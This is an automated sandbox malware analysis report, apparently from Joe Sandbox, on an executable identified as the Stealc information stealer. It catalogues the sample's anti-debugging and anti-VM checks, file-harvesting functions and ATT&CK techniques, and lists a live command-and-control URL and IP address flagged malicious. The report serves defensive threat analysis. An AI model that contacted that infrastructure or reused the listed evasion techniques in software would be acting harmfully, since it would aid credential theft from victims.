                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA67D second address: 10CA683 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CDB9D second address: 10CDBDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533115h 0x00000007 jmp 00007F672053310Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jns 00007F672053310Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007F6720533106h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0322 second address: 4FF0326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0326 second address: 4FF032C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF032C second address: 4FF036A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F67208644D3h 0x00000009 sbb esi, 55DF83CEh 0x0000000f jmp 00007F67208644D9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF036A second address: 4FF03AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F6720533114h 0x0000000c add ah, 00000078h 0x0000000f jmp 00007F672053310Bh 0x00000014 popfd 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6720533114h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03AC second address: 4FF03EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F67208644CBh 0x00000013 sub esi, 516BCC9Eh 0x00000019 jmp 00007F67208644D9h 0x0000001e popfd 0x0000001f mov ch, 08h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03EE second address: 4FF03F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03F4 second address: 4FF03F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E41A53 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FE6A4F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FF064B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 106BD37 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00BF38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BF4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BEDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BEE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BEED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00BF4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BEF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00BF3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BE16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BEDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BEBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE1160 GetSystemInfo,ExitProcess,0_2_00BE1160
                Source: file.exe, file.exe, 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1399229578.00000000009E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0o
                Source: file.exe, 00000000.00000002.1399229578.0000000000A12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13627
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13624
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13639
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13679
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13644
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE45C0 VirtualProtect ?,00000004,00000100,000000000_2_00BE45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BF9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF9750 mov eax, dword ptr fs:[00000030h]0_2_00BF9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00BF78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7056, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00BF9600
                Source: file.exeBinary or memory string: PoProgram Manager
                Source: file.exe, 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: oProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00BF7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00BF7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00BF7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00BF7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.be0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1358788116.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7056, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.be0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1358788116.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7056, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpWindowsfile.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/wsfile.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpcfile.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpZfile.exe, 00000000.00000002.1399229578.0000000000A1A000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/Mfile.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37sfile.exe, 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1529189
                            Start date and time:2024-10-08 18:25:06 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 8s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 83
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.947297463352463
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'835'520 bytes
                            MD5:f7b1143886156d2a48fcda8f5dec586e
                            SHA1:d0f524caa5ff55008c62c71fe8bf47e5c9cb12b2
                            SHA256:2b2dba893754d1e80e4fd6520017a706679796376cddcb37a09552e170e4ce21
                            SHA512:91ad77a423e2a8b84233ff5e6f80c91001311c2ba7d3caf451b3afc6f344c6a13be2cdceb33f5b1bde33275b3c7c971f73c34bd597f46975033d7a9f409304e0
                            SSDEEP:49152:HluWcX7kogYkCKXeCftKfjGUmQ6OU3cv:Hlz07kog5xuZ0cv
                            TLSH:7B8533B26DA2E25ADC3EA731BBAB03971360A3440C9596723BE5C731D585C4CE7D2378
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xa92000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F6720DC151Ah
                            pavgb mm3, qword ptr [ebx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, ch
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            add byte ptr [ebx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax], bl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x22800969a8684ebee764e4dee15c071ccce60unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
